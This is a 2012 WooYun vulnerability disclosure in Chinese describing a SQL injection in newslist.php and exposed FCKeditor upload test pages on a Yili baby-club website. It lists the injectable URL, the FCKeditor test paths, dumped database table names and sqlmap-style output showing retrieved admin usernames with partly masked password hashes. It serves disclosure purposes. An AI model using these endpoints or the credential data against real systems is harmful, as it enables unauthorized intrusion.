当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014760

漏洞标题:伊利sql注入和test fckeditor

相关厂商:伊利

漏洞作者: luom

提交时间:2012-11-14 21:03

修复时间:2012-12-29 21:03

公开时间:2012-12-29 21:03

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-12-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

伊利存在sql注射漏洞与fckeditor漏洞,可以成功利用进入后台。

详细说明:

http://yilibabyclub.yili.com/newslist.php?cid=22
newslist.php文件过滤不严 导致注入
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/uploadtest.html
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/test.html
注入可得到用户和密码

current database:    'aierclub'
+-----------------------+
| aier_temptab |
| yili_activity_cat |
| yili_answers |
| yili_articletags |
| yili_attachments |
| yili_attenction |
| yili_category |
| yili_collection_music |
| yili_editortmp |
| yili_expert_advice |
| yili_jf_adds |
| yili_jf_area |
| yili_jf_cary |
| yili_jf_city |
| yili_jf_conts |
| yili_jf_history |
| yili_jf_keywords |
| yili_jf_order |
| yili_jf_orderdetail |
| yili_jf_pages |
| yili_jf_province |
| yili_logs |
| yili_manager |
| yili_music |
| yili_pages |
| yili_picture |
| yili_picture_cat |
......
......
......


[17:47:23] [INFO] retrieved: 0e27216391e1c9f78b2c8342********
[17:47:24] [INFO] retrieved: admin
[17:47:29] [INFO] retrieved: 0f1fc4043a5886b7be6a3f92********
[17:47:30] [INFO] retrieved: newsmanager
[17:47:31] [INFO] retrieved: 47f98eb812f4c024f86aada4********
[17:47:32] [INFO] retrieved: aierfaq
[17:47:34] [INFO] retrieved: 70d945641e7ccb833de07054********
[17:47:35] [INFO] retrieved: aiernews
[17:47:36] [INFO] retrieved: add77e3e0a140b05da1f0dcb********
[17:47:36] [INFO] retrieved: loger
[17:47:37] [INFO] retrieved: b81fd1b160bdebaaf3f1e377********
[17:47:37] [INFO] retrieved: weslywang
[17:47:38] [INFO] retrieved: c81feb1f2a863dc015f313e8********
[17:47:41] [INFO] retrieved: logs2

漏洞证明:

1.jpg


后台

3.jpg

修复方案:

密码强大点,过滤严一点,无用文件删一点,你比我多懂一点。

版权声明:转载请注明来源 luom@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝